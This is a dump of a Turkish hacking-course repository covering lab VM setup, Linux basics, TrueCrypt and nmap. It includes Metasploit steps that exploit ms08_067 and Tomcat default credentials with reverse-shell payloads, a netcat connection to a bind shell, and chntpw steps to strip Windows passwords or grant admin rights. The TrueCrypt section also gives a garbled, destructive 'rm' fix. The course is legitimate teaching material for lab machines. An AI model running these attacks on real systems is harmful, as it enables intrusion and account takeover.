https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/pass2.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/password.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/password.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/reg1.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/reg1.1.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/reg1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/reg1.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/reg2.2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/reg2.2.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/reg2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/reg2.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/truecrypt/usb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/truecrypt/usb.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/windows-sifre/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/windows-sifre/1.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/windows-sifre/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/windows-sifre/2.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/windows-sifre/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/windows-sifre/3.png -------------------------------------------------------------------------------- /00-temeller/odevler/images/windows-sifre/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/halit/hackercamp/c6f45640f1c0ff53e0c7c826540b7a9c1cec57dc/00-temeller/odevler/images/windows-sifre/4.png -------------------------------------------------------------------------------- /00-temeller/odevler/kali-linux-kurulumu.md: -------------------------------------------------------------------------------- 1 | # Kali Linux Kurulumu 2 | 3 | ## NAT Network Kurulumu 4 | 5 | - İlk olarak **File** menüsü altından **Preferences** kısmı açılır. 6 | 7 | ![1](images/kali-linux/Selection_1.png) 8 | 9 | - Açılan menüden **Network** alt menüsüne geçilir. Buradan sağ tarafta yer alan **Adds new NAT network** butonuna tıklanır. 10 | 11 | ![2](images/kali-linux/Selection_2.png) 12 | 13 | - Burada yeni eklenen **NatNetwork** seçeneğine çift tıklanır. 14 | 15 | ![3](images/kali-linux/Selection_3.png) 16 | 17 | - Network ismi ve ip aralığı belirlenir. 18 | 19 | ![4](images/kali-linux/NAT Network Details_008.png) 20 | 21 | - Resimdeki gibi seçilerek devam edilir. 22 | 23 | ![5](images/kali-linux/VirtualBox - Preferences_009.png) 24 | 25 | ## Sanal Makinenin Oluşturulması 26 | 27 | - Yeni bir sanal makine oluşturmak için **New** butonuna tıklıyoruz. 28 | 29 | ![6](images/kali-linux/Selection_010.png) 30 | 31 | - Sanal makinenin ismini belirleyip **Type** ve **Version** kısımları aşağıdaki gibi seçiyoruz. 32 | 33 | ![7](images/kali-linux/Create Virtual Machine_011.png) 34 | 35 | - **Memory Size** 1024 MB olarak belirliyoruz ve **next** diyoruz. 36 | 37 | ![8](images/kali-linux/Create Virtual Machine_012.png) 38 | 39 | - **Create a virtual hard disk now** seçeneğini seçip devam ediyoruz. 40 | 41 | ![9](images/kali-linux/Create Virtual Machine_013.png) 42 | 43 | - **VDI** seçeneğini seçip devam ediyoruz. 44 | 45 | ![10](images/kali-linux/Create Virtual Hard Disk_014.png) 46 | 47 | - **Dynamically allocated** seçeneğini seçip devam ediyoruz. 48 | 49 | ![11](images/kali-linux/Create Virtual Hard Disk_015.png) 50 | 51 | - File boyutunu 20 GB yapıp **Create** diyoruz. 52 | 53 | ![12](images/kali-linux/Create Virtual Hard Disk_016.png) 54 | 55 | - **pentest** isimli sanal makinemiz aşağıdaki gibi oluşmuş oluyor. 56 | 57 | ![13](images/kali-linux/Selection_017.png) 58 | 59 | - Burada yeni oluşturulan sanal makine seçili iken **Settings** butonuna tıklıyoruz. 60 | 61 | ![14](images/kali-linux/Selection_018.png) 62 | 63 | - Sağ kısımdan **Network** butonuna tıklayıp daha önceden oluşturduğumuz NAT networkünü seçiyoruz. 64 | 65 | ![15](images/kali-linux/pentest - Settings_019.png) 66 | 67 | - Daha sonra sol kısımdan **Storage** kısmına geçiyoruz. 68 | 69 | ![16](images/kali-linux/pentest - Settings_020.png) 70 | 71 | - Burada aşağıdaki gibi **Choose Virtual Optical Disk File** diyoruz. 72 | 73 | ![17](images/kali-linux/Selection_022.png) 74 | 75 | - İndirdiğimiz Kali Linux imajının yolunu seçiyoruz. 76 | 77 | ![18](images/kali-linux/Selection_023.png) 78 | 79 | - **OK** deyip devam ediyoruz. 80 | 81 | ![19](images/kali-linux/pentest - Settings_024.png) 82 | 83 | ## Kali Linux Kurulumu 84 | 85 | - Yeni oluşturduğumuz sanal makineyi çalıştırmak için **Start** butonuna tıklıyoruz. 86 | 87 | ![19](images/kali-linux/Selection_025.png) 88 | 89 | - Aşağıdaki gibi **Install** seçmesini seçip devam ediyoruz. 90 | 91 | ![20](images/kali-linux/Selection_026.png) 92 | 93 | - Buradan dil olarak **English** seçiyoruz. Siz Türkçe de seçebilirsiniz. 94 | 95 | ![21](images/kali-linux/Selection_027.png) 96 | 97 | - Ülke seçiminde önce **Other** seçmesini seçip, 98 | 99 | ![22](images/kali-linux/Selection_028.png) 100 | 101 | - **Asia** deyip, 102 | 103 | ![23](images/kali-linux/Selection_029.png) 104 | 105 | - **Turkey** seçiyoruz. 106 | 107 | ![24](images/kali-linux/Selection_030.png) 108 | 109 | - Daha sonra aşağıdaki gibi seçip devam ediyoruz. Buraları kendinize uygun olarak değiştirebilirsiniz. 110 | 111 | ![25](images/kali-linux/Selection_031.png) 112 | 113 | - Aşağıdaki gibi Türkçe klavye seçip devam ediyoruz. 114 | 115 | ![26](images/kali-linux/Selection_032.png) 116 | 117 | - Burada kurulumu bekliyoruz. 118 | 119 | ![27](images/kali-linux/Selection_033.png) 120 | 121 | - **Hostname** belirleyip devam ediyoruz. 122 | 123 | ![28](images/kali-linux/Selection_034.png) 124 | 125 | - **Domain** kısmını boş bırakıyoruz. 126 | 127 | ![29](images/kali-linux/Selection_035.png) 128 | 129 | - Parolamızı giriyoruz. Onay kutucuğu geldiğinde tekrardan giriyoruz. 130 | 131 | ![30](images/kali-linux/Selection_036.png) 132 | 133 | - Bekliyoruz. 134 | 135 | ![31](images/kali-linux/Selection_037.png) 136 | 137 | - Sanal makine içerisindeki tüm diski kullanmak adına aşağıdaki gibi seçebiliriz. Full-disk encryption özelliği ile birlikte kuracaksanız **Guided - use entire disk and set up encrypted LVM** seçeneğini seçebilirsiniz. 138 | 139 | ![32](images/kali-linux/Selection_038.png) 140 | 141 | - Aşağıdaki gibi seçip devam ediyoruz. 142 | 143 | ![33](images/kali-linux/Selection_039.png) 144 | 145 | - Tüm dosyaları tek bölümde tutabiliriz. Bunun için aşağıdaki seçeneği seçiyoruz. 146 | 147 | ![34](images/kali-linux/Selection_040.png) 148 | 149 | - Bölümleme işini bitiriyoruz. 150 | 151 | ![35](images/kali-linux/Selection_041.png) 152 | 153 | - **Yes** deyip devam ediyoruz. 154 | 155 | ![36](images/kali-linux/Selection_042.png) 156 | 157 | - Verilerin diske kopyalanmasını bekliyoruz. 158 | 159 | ![37](images/kali-linux/Selection_043.png) 160 | 161 | - Burada **Yes** diyip devam ediyoruz. 162 | 163 | ![38](images/kali-linux/Selection_044.png) 164 | 165 | - Direk **continue** diyip devam ediyoruz. 166 | 167 | ![39](images/kali-linux/Selection_045.png) 168 | 169 | ![40](images/kali-linux/Selection_046.png) 170 | 171 | - **Yes** diyip devam ediyoruz. 172 | 173 | ![41](images/kali-linux/Selection_047.png) 174 | 175 | - Aşağıdaki gibi seçip devam ediyoruz. 176 | 177 | ![42](images/kali-linux/Selection_048.png) 178 | 179 | - Bekliyoruz. 180 | 181 | ![43](images/kali-linux/Selection_049.png) 182 | 183 | - **Continue** deyip devam ediyoruz. 184 | 185 | ![44](images/kali-linux/Selection_050.png) 186 | 187 | - Burada sağ alttaki kısımda hiçbirşeyin seçili olmadığından emin oluyoruz. 188 | 189 | ![45](images/kali-linux/Selection_053.png) 190 | 191 | - **Username** giriyoruz. 192 | 193 | ![46](images/kali-linux/Selection_054.png) 194 | 195 | - **Password** giriyoruz. Eğer herhangi bir problem yoksa önünüze masaüstü gelmesi gerekiyor. 196 | 197 | ![47](images/kali-linux/Selection_055.png) 198 | 199 | ## Guest Eklentilerinin Kurulumu 200 | 201 | - İlk önce **Devices** menüsü altından **Insert Guest Additions CD image** seçeneği ile cd'yi bağlıyoruz. 202 | 203 | ![48](images/kali-linux/VBoxAdditions.png) 204 | 205 | - Terminal'i açıyoruz. 206 | 207 | ![49](images/kali-linux/Selection_058.png) 208 | 209 | ``` 210 | cp /media/cdrom0 vbox -r 211 | cd vbox/ 212 | ./VBoxLinuxAdditions.run 213 | ``` 214 | - Komutlarını aşağıdaki gibi sırayla çalıştırıyoruz. 215 | 216 | ![50](images/kali-linux/Selection_059.png) 217 | 218 | ![51](images/kali-linux/Selection_060.png) 219 | 220 | - **Machine->Reset Host** deyip sistemi baştan başlatıyoruz ve kurulumu tamamlamış oluyoruz. Burada doğrudan komut satırından **reboot** komutu verilerek de sistem yeniden başlatılabilir. 221 | 222 | ![52](images/kali-linux/Workspace 1_061.png) 223 | 224 | ## Sistemin Güncellenmesi 225 | 226 | - Aşağıdaki komutu çalıştırarak sistemi güncelleyebilirsiniz. 227 | 228 | ```sudo apt-get update && apt-get upgrade && apt-get dist-upgrade && apt-get -f install && apt-get autoremove``` 229 | 230 | ![53](images/kali-linux/Selection_062.png) 231 | 232 | ![54](images/kali-linux/Selection_063.png) 233 | 234 | ## Snapshot Alınması 235 | 236 | - Tüm işlerinizi tamamladıysanız sol üstten **Snapshot** seçmesine tıklayıp aşağıdaki gibi makinenizin son durumunun snapshot'ını alabilirsiniz. 237 | 238 | ![55](images/kali-linux/Selection_065.png) 239 | 240 | -------------------------------------------------------------------------------- /00-temeller/odevler/metasploitable.md: -------------------------------------------------------------------------------- 1 | # Metasploitable 2 | 3 | ## Sanal Makine Oluşturulması 4 | 5 | - İlk olarak yeni bir sanal makine oluşturmak için **Yeni** butonuna tıklıyoruz. 6 | 7 | ![0](images/Metasploitable/0.jpg) 8 | 9 | - Sanal makinenin ismini belirleyip **Türü** ve **Sürüm** kısımlarını aşağıdaki gibi seçiyoruz. 10 | 11 | ![1](images/Metasploitable/1.jpg) 12 | 13 | - **Bellek Boyutu** 512 MB olarak belirliyoruz ve **İleri** diyoruz. 14 | 15 | ![2](images/Metasploitable/2.jpg) 16 | 17 | - **Mevcut sanal sabit disk dosyasi kullan** (Use an existing virtual hard disk file) seçeneğini seçiyoruz. 18 | 19 | ![3](images/Metasploitable/3.jpg) 20 | 21 | - Sağ alttaki dizin butonuna tıklayarak daha önceden indirdiğiniz **Metasploitable.vmdk** dosyasını seçiyoruz. 22 | 23 | ![4](images/Metasploitable/4.jpg) 24 | 25 | - Bu aşamadan sonra **Oluştur** diyoruz. 26 | 27 | ![5](images/Metasploitable/5.jpg) 28 | 29 | - Sanal makinemizi çalıştırdıktan sonra aşağıdaki gibi bir ekran karşımıza geliyor. 30 | 31 | ![6](images/Metasploitable/7.jpg) 32 | 33 | ## Nat Network Kurulumu 34 | 35 | - Nat network kurulumu [burada][1] anlatılmıştır. 36 | - Daha önce Nat network ağını kurduysanız **pentestlab-network** sanal makinanızın **ayarlar->ağ** bölümünden Nat ağını seçebilirsiniz. 37 | 38 | ![7](images/Metasploitable/8.jpg) 39 | 40 | ## Snapshot Alınması 41 | 42 | - Sanal makineniz seçili iken sağ üst köşedeki **Anlık Görüntüler** (Snapshot) seçmesine tıklayarak aşağıdaki gibi anlık görüntü alabilirsiniz. 43 | 44 | ![8](images/Metasploitable/9.jpg) 45 | 46 | [1]: kali-linux-kurulumu.md 47 | -------------------------------------------------------------------------------- /00-temeller/odevler/suid-crontab.md: -------------------------------------------------------------------------------- 1 | # SUID Biti 2 | 3 | - Bir kullanıcının, bir programı kendisine tanınmış haklardan daha fazla izne sahip olarak çalıştırması gerektiği durumlarda kullanılmaktadır 4 | - Yani herhangi bir program herhangi bir kullanici tarafından program sahibinin haklarıyla çalıştırılabilir. 5 | - Örnek olarak kullanıcıların şifrelerinin tutulduğu /etc/shadow dosyasına sadece root kullanıcısı olarak erişebiliriz. 6 | - Aşağıda deneme1 adlı kullanıcı oluşturulup **su** komutu ile kullanıcıya geçiş yapılmıştır. 7 | 8 | ![1](images/suid/1.png) 9 | 10 | - **passwd** komutu ile bir kullanıcıya parola atamak için kullanılır. 11 | - Yani bu komutu kullanarak şifresini değiştiren bir kullanıcı shadow dosyası üzerinde değişiklik yapmış olur. 12 | 13 | ![2](images/suid/2.png) 14 | 15 | - Yetkimizin olmadığı bir dosyada değişiklik yapabilmemizin nedeni /usr/bin/passwd dosyasında **suid** bitinin etkinleştirilmiş olmasından kaynaklanıyor. 16 | - Aşağıda yer alan izin diziliminde geçen 's' biti suid bitinin aktifliğini göstermektedir. 17 | 18 | ![3](images/suid/3.png) 19 | 20 | - SUID biti durumu dikkat edilmesi gereken bir konudur. 21 | - Çünkü kötü amaçlı bir kimse bu biti aktif edilmiş bir programda kendini root yapmaya çalışabilir. 22 | - Sistemdeki suid biti aktif edilmiş dosyalara aşağıdaki komut ile ulaşılanabilir. 23 | 24 | ``` 25 | sudo find / -perm -u+s -type f -exec ls -l {} \ ; 26 | ``` 27 | 28 | ![4](images/suid/4.png) 29 | 30 | - Sistem de çalışan süreçleri ve bu süreçlerin id lerini görüntülemek için ps komutundan yararlanılabilir. 31 | - Aşağıdaki script ile parametre olarak verilen processin çalışıp çalışmadığının kontrolü yapılıp ilgili bilgileri ekrana yazdırılıyor. 32 | 33 | ![5](images/crontab/6.png) 34 | 35 | ![6](images/crontab/7.png) 36 | 37 | # Crontab 38 | 39 | - Crontab belirlenen bir zaman diliminde istenilen scriptlerin ya da programların çalışmasını sağlar.Yani bir görev planlayıcısıdır. 40 | - Mesala belli zaman aralıklarında dosyalarımızın yedeklerini almak için kullanabiliriz. 41 | - Aşağıdaki resimde /etc dizini altındaki crontab dosyasının içeriği gösterilmektedir. 42 | 43 | ![7](images/crontab/8.png) 44 | 45 | - Aşağıdaki komut ile **crontab** dosyasını editleyebiliriz. **nano** kullanarak yapabilirsiniz. 46 | 47 | ![8](images/crontab/9.png) 48 | 49 | - Sonra planlamak istediğiniz görevi aşağıdaki gibi ekleyebilirsiniz. 50 | - Burada sondan itibaren ilk * karakteri : Haftanın Günleri (0-6 Pazar:0) 51 | - İkinci : Ay(1-12) 52 | - Ucuncu : Ayın Günleri(1-31) 53 | - Dorduncu : Saat(0-23) 54 | - Besinci : Dakika(0-59) 55 | - Aşağıda script2 dosyasının her 2 dakikada bir çalıştırmaya ayarlanması gösterilmektedir. 56 | 57 | ![9](images/crontab/10.png) 58 | 59 | - **du** komutu bulunduğu dizinin alt klasörlerde dahil toplam boyutunu verir. 60 | - **sort** komutu ise sıralama yapar. 61 | - **wc** komutu parametre olarak verilen dosyadaki satır, kelime ve karakter sayısını gösterir. 62 | - Bu komutların birlikte kullanımı aşağıdaki resimden görülebilir. 63 | 64 | ![10](images/crontab/11.png) 65 | 66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /00-temeller/odevler/truecrypt-kullanimi.md: -------------------------------------------------------------------------------- 1 | # Truecrypt kurulumu ve kullanımı 2 | 3 | ## Truecrypt Hakkında 4 | 5 | - Sabit disklerin ve özellikle usb belleklerin şifrelenmesi için tercih edilen bir yazılımdır. Ayrıca şifreli dosya blokları oluşturmak için de kullanılabilir. 6 | - Uzun süren geliştirilme süreci sonunda başarılı bir yazılım olan Truecrypt'ın, sebebi bilinmeyen bir şekilde bir anda anasayfasına "artık güvenli değil" yazılarak geliştirilmesi durduruldu. 7 | - Yakın zamanda birçok akademisyenin ortak çalışması ile birlikte Truecrypt detaylıca incelendi. Yayınlanan sonuç raporuna göre de güvenilir olarak kabul edildi. Bu yüzden hala aktif bir şekilde kullanılmaktadır. 8 | 9 | ## Truecrypt Kurulum Platformu 10 | 11 | - En son sürümü yayınlanan [Truecrypt 7.2][1], Windows ve MacOS işletim sistemi üzerinde şifreleme yapmamaktadır. 12 | - Bunun için Windows ve MacOS platformunda veri şifrelemesi yapmak için [Truecrypt 7.1][2] sürümlerinden birisini kurmalısınız. Kendi sitesinde eski dağıtımlara ulaşmak mümkün olmadığı gibi bu dağıtımlara [github][2] üzerinden ulaşmanız mümkündür. 13 | 14 | ## Debian Tabanlı Dağıtımlar İçin Truecrypt Kurulumu 15 | 16 | ``` 17 | sudo add-apt-repository ppa:stefansundin/truecrypt 18 | sudo apt-get update 19 | sudo apt-get install truecrypt 20 | ```` 21 | - Yukarıdaki komutları sırasıyla terminal üzerinde çalıştırıyoruz. 22 | 23 | ``` 24 | /etc/apt/sources.list.d/*********.list.save 25 | ``` 26 | 27 | - Yukarıdaki gibi bir hata ile karşılaşırsanız aşağıdaki komutu çalıştırarak sorunu çözebilirsiniz. Ancak bu komutların tam olarak ne yaptığını araştırma yaparak öğrenmek faydalı olacaktır 28 | 29 | ```` 30 | sudo rm -rm /etc/apt/sources.list.d 31 | ``` 32 | 33 | - İşlem bittikten sonra terminal üzerinden **truecrypt** yazarak programı çalıştırmanız mümkündür. 34 | 35 | ## Truecrypt USB Disk Şifreleme 36 | 37 | - Programı çalıştırdıktan sonra aşağıdaki adımları takip edebilirsiniz. 38 | 39 | ![3](images/truecrypt/create.png) 40 | 41 | - **Create Volume** seçeneğini seçelim. Eğer bu buton görünmüyorsa, sürümün **7.2** olmadığını kontrol etmelisiniz. Sürüm sıkıntısından yukarıda bahsedilmiştir. 42 | 43 | ![4](images/truecrypt/usb.png) 44 | 45 | - Karşımızda 2 seçenek bulunuyor. 1. seçenek diskten belirli bir bloğu şifreleme işlemi için tercih edilir. 46 | - İkinci seçenekte ise USB bellek gibi bir cihazın tamamını şifreleme işlemini yapmanızı sağlar. İkinci seçeneği seçerek devam edelim. 47 | 48 | ![5](images/truecrypt/hidden.png) 49 | 50 | - İlk işlem normal bir Truecrypt containeri oluşturmanızı sağlar. 51 | - İkinci işlem ise var olan bir container içerisinde gizli bir container daha oluşturmaya yarar. Bu sayede aynı disk iki farklı şifre ile açılabilir olmaktadır. Önem derecesine göre verilerinizi bu bölgelere yerleştirebilirsiniz. 52 | 53 | ![6](images/truecrypt/local.png) 54 | 55 | - **Select Device** tıklayarak resimdeki diskler arasında şifrelemek istediğiniz cihazı seçmelisiniz. Daha sonra **Next** ile ilerleyebilirsiniz. 56 | 57 | ![7](images/truecrypt/hash.png) 58 | 59 | - Şifreleme ve Hash yöntemlerini seçmelisiniz. İlk başta default seçenekler ile işlemi tamamlamanız önerilir. İyi bir seçim yapılmak isteniyorsa **AES-Twofish-Serpent** şifrelemesi ile **Whirlpool** hash algoritması seçilebilir. 60 | 61 | ![8](images/truecrypt/password.png) 62 | 63 | - Diskiniz içerisindeki verilere erişmenizi sağlayacak parolanızı giriniz. 64 | 65 | ![9](images/truecrypt/format.png) 66 | 67 | - Şifreleme işlemi sırasında Truecrypt random bazı değerlere ihtiyaç duymaktadır. Bu random değerleri üretmek için mouse hareketleriniz kullanılmaktadır. Bu yüzden ilgili ekrana gelindiğince ne kadar uzun süre mouse pencere içerisinde hareket ettirilirse o derece yüksek karmaşıklığa sahip şifreleme işlemi gerçekleştirilecektir. Random pool değerlerinin gösteriminin kapatılması ile daha ileri seviyede güvenlik önemli alınabilir. 68 | - Bu işlem bittikten sonra karşınıza klasör gelecektir ve şifreleme işlemi için arayüz size yönlendirme yapacaktır. Yine next dedikten sonra karşınıza hash ve şifreleme algoritmaları seçme arayüzü gelecektir. 69 | - Yukarıda yapılan benzer işlemler gerçekleştirildiğinde en son aşağıdaki ekrana ulaşılacaktır. Burada ulaşılan kısım artık gizli container bölgesinin işlemleridir. 70 | 71 | ![10](images/truecrypt/pass2.png) 72 | 73 | - Şifreyi belirledikten sonra yukarıdaki iterasyonu devam ettirelim. 74 | 75 | ![11](images/truecrypt/end.png) 76 | 77 | - Şifreleme işlemimiz tamamlanmıştır. 78 | 79 | ## Truecrypt Şifrelenmiş Cihazı Kullanmak 80 | 81 | - Bu işlemi yapmak için **Truecrypt** programına sahip olmanız gerekmektedir. Programı çalıştırdıktan sonra **Volume** üzerinden diski seçmelisiniz. Aşağıda şifreli diskimize standart şifremiz ile giriş yapılmasıyla, gizli şifremiz ile giriş yapılması sonucunda oluşan durumlar gösterilmektedir. 82 | 83 | ### Normal Container 84 | 85 | ![12](images/truecrypt/reg1.png) 86 | 87 | ![13](images/truecrypt/reg1.1.png) 88 | 89 | 90 | ### Gizli Container 91 | 92 | ![14](images/truecrypt/reg2.png) 93 | 94 | ![15](images/truecrypt/reg2.2.png) 95 | 96 | 97 | [1]: http://www.onaymetinkivilcim.com/Dersler/Truecrypt-Kullanimi/65 98 | [2]: https://github.com/DrWhax/truecrypt-archive 99 | -------------------------------------------------------------------------------- /00-temeller/odevler/windows-sifre.md: -------------------------------------------------------------------------------- 1 | # Windows Şifre 2 | 3 | ## Kullanıcı Hesabı Düzenleme 4 | 5 | - Kali Linux'u Windows işletim sisteminin kurulu olduğu makinede USB disk veya CDROM kullanarak boot ediyoruz. 6 | - Boot işlemi sonunda harddisk yolu belirlenmelidir. Bunun için **lsblk** komutu kullanılabilir. 7 | - Disk adı ve yolu bulunduktan sonra **mount** komutu ile bağlanacaktır. İlgili bağlama işlemi Kali'nin üst kısımlarında yer alan panelden de gerçekleştirilebilir. Örnekte bu şekilde yapılmıştır. Haliyle disk **/media/root/** yolu altındaki alt klasöre bağlanmıştır. 8 | - Dizin başarıyla bağlandıktan sonra **Windows/System32/config** yoluna gidilir. 9 | 10 | ![1. adım](images/windows-sifre/1.png) 11 | 12 | - Bu klasör altında Windows'un kullanıcı hesabı bilgilerinin depolandığı **.sam** dosyaları vardır. Aşağıdaki resim bu dosyaları göstermektedir. 13 | 14 | ![2. adım](images/windows-sifre/2.png) 15 | 16 | - SAM dosyalarının içeriğini görmek için **chntpw -l SAM** komutu kullanılabilir. 17 | 18 | ![3. adım](images/windows-sifre/3.png) 19 | 20 | - Ekranda gözüken listede hesaplar ve hesapların bazı özellikleri yazmaktadır. Düzenlemek istediğiniz hesabı **chntpw** aracına **-u** parametresi vererek seçebilirsiniz. Mesela **Camp** kullanıcısı için **chntpw -u Camp SAM** yazmanız yeterlidir. 21 | 22 | ![4. adım](images/windows-sifre/4.png) 23 | 24 | - Gelen ekran kullanıcı hesabı ile ilgili daha fazla detay içermektedir. 25 | - Bu ekranda 1,2,3,4,5 ve q komutları kullanılarak bazı işlemler gerçekleştirilebilir. 26 | - **1:** Kullanıcının şifresini kaldır 27 | - **2:** Kilidi kaldır ve hesabı aktif et(burada hesabın aktif durumunu gösteriyor) 28 | - **3:** Hesabı yükselt yani hesaba admin yetkilerini ver 29 | - **4:** Bir gruba kullanıcı hesabı ekle 30 | - **5:** Bir gruptan kullanıcı sil 31 | - **q:** Çıkış 32 | - Burdan dilediğiniz işlemleri uyguladıktan sonra q seçimini yaparak çıkabilirsiniz. "q" seçimini yaptıktan sonra değişiklikleri onaylıyorsanız "y" seçip kaydediniz. 33 | - Ardından bilgisayarınızı yeniden başlatıp uyguladığınız değişikliklerin sonuçlarını alabilirsiniz. 34 | -------------------------------------------------------------------------------- /01-ag-guvenligi/00-temel-network.md: -------------------------------------------------------------------------------- 1 | # Temel Network 2 | 3 | ## Komutlar 4 | 5 | - Interface yönetimi 6 | ``` 7 | ip link 8 | ifconfig 9 | ifconfig eth0 192.168.10.12 netmask 255.255.255.0 10 | ``` 11 | 12 | - IP talebi 13 | ``` 14 | dhclient eth0 15 | dhcpd eth0 16 | ``` 17 | 18 | - Arp tablosu içeriğini görüntelemek 19 | ``` 20 | arp -a 21 | ``` 22 | 23 | - Statik arp kaydı girmek 24 | ``` 25 | arp -s 192.168.1.4 00-10-54-CA-E1-40 26 | ``` 27 | 28 | - ICMP echo pakedi gönderme 29 | ``` 30 | ping 8.8.8.8 31 | ping google.com 32 | ping 8.8.8.8 -c 1 33 | ``` 34 | 35 | - DNS sorguları 36 | ``` 37 | nano /etc/resolv.conf 38 | dig a halit.ninja 39 | dig aaaa 6.halit.ninja 40 | dig txt question.halit.ninja 41 | nslookup halit.ninja 42 | nslookup halit.ninja 8.8.8.8 43 | ``` 44 | 45 | - Netcat aracı ile HTTP isteği gönderme 46 | ``` 47 | nc halitalptekin.com 80 48 | 49 | GET / HTTP/1.1 50 | Host: halitalptekin.com 51 | ``` 52 | 53 | - Curl aracı ile HTTP isteği gönderme 54 | ``` 55 | curl -v http://halitalptekin.com 56 | ``` 57 | 58 | - Traceroute aracı ile paket takibi 59 | ``` 60 | traceroute google.com 61 | ``` 62 | 63 | - Host aracı ile hostname öğrenme 64 | ``` 65 | host 8.8.8.8 66 | ``` 67 | 68 | ## Ödevler 69 | 70 | - **mitmf** aracını kullanarak man in the middle saldırısı gerçekleştiriniz. 71 | - **wireshark** ile networkünüzde oluşan trafiği inceleyiniz. 72 | - **fragroute** aracının kullanımını öğreniniz. Hangi amaçla kullanılabileceğini araştırınız. 73 | - ICMP üzerinden trafik tünellemenin nasıl yapılacağını araştırınız. 74 | - DNS üzerinden trafik tünellemenin nasıl yapılacağını araştırınız. 75 | - DNS kaynaklı gerçekleştirilebilecek saldırıları araştırınız. 76 | - DHCP kaynaklı gerçekleştirilebilecek saldırıları araştırınız. 77 | - İstediğiniz bir programlama dilinde ARP veya DNS üzerinden man in the middle saldırısı yapabilecek araç geliştiriniz. 78 | - İstediğiniz bir programlama dilinde traceroute aracının benzerini gerçekleştiriniz. 79 | 80 | ## Kaynaklar 81 | 82 | - https://technet.microsoft.com/tr-tr/library/cc786900(v=ws.10).aspx 83 | - http://microchip.wikidot.com/tcpip:detailed-tcpip-communication 84 | - http://selimozdem.com/ositcpip-1-2-notlari.html/ 85 | - http://www.hotspotshield.com/learn/what-is-ip-address 86 | - http://www.highteck.net/EN/Network/Addressing_the_Network-IPv4.html 87 | - http://wiki.mikrotik.com/wiki/Manual:Connection_oriented_communication_(TCP/IP) 88 | -------------------------------------------------------------------------------- /01-ag-guvenligi/01-bilgi-toplama.md: -------------------------------------------------------------------------------- 1 | # Bilgi Toplama 2 | 3 | ## Komutlar 4 | 5 | ``` 6 | nmap 10.0.3.7 7 | nmap 10.0.3.7 -O 8 | nmap -sV -p 80 10.0.3.7 9 | nmap -sV -p 80 10.0.3.7 -v 10 | nmap -sS 10.0.3.7 -p 1-100 11 | nmap -sP 10.0.3.7 12 | nmap -A 10.0.3.7 13 | nmap -p- -n -v -T4 10.0.3.7 14 | nmap -p- -n -v -T4 10.0.3.7 -sV 15 | nmap -sA 10.0.3.7 -p 80 16 | nmap -p- -n -v -T4 10.0.3.7 -oG results.txt 17 | nmap --spoof-mac 10:10:10:10:10:10 18 | nmap -D 10.3.3.3,10.3.3.4,10.3.3.5 10.0.3.7 19 | nmap -p 445 -n -v -T4 -sV --script smb-enum-shares 10.0.3.6 20 | nc 10.0.3.6 9999 21 | netdiscover -r 10.0.3.0/24 22 | ``` 23 | 24 | ## Ödevler 25 | 26 | - **zmap** ve **masscan** araçlarının kullanımlarını öğreniniz. 27 | - **Nmap** aracı ile birlikte nasıl güvenlik duvarlarının atlatıldığını araştırınız. 28 | - **nc** ile nasıl port tarama yapılabileceğini araştırınız. 29 | - **arpscan** aracının kullanımını araştırınız. 30 | -------------------------------------------------------------------------------- /01-ag-guvenligi/02-servis-saldirilari.md: -------------------------------------------------------------------------------- 1 | # Servis Saldırıları 2 | 3 | ## Komutlar 4 | 5 | ``` 6 | msfconsole 7 | db_rebuild_cache 8 | search ms08 9 | use exploit/windows/smb/ms08_067_netapi 10 | show options 11 | set rhost 10.0.3.6 12 | set payload windows/meterpreter/reverse_tcp 13 | set lhost 10.0.3.5 14 | exploit 15 | ls 16 | pwd 17 | getuid 18 | screenshot 19 | search tomcat 20 | use auxiliary/scanner/http/tomcat_mgr_login 21 | show options 22 | set rhost 10.0.3.7 23 | set rport 8180 24 | use exploit/multi/http/tomcat_mgr_deploy 25 | show options 26 | set rhost 10.0.3.7 27 | set rport 8180 28 | set username tomcat 29 | set password tomcat 30 | set payload java/meterpreter/reverse_tcp 31 | set lhost 10.0.3.5 32 | nc 10.0.3.7 1524 33 | ``` 34 | 35 | ## Ödevler 36 | 37 | - Exploit-db, 0day.today benzeri siteleri araştırınız ve düzenli olarak takip ediniz. 38 | - Açıklıkların paylaşıldığı diğer plaformları araştırınız. 39 | - Nessus veya openvas aracını 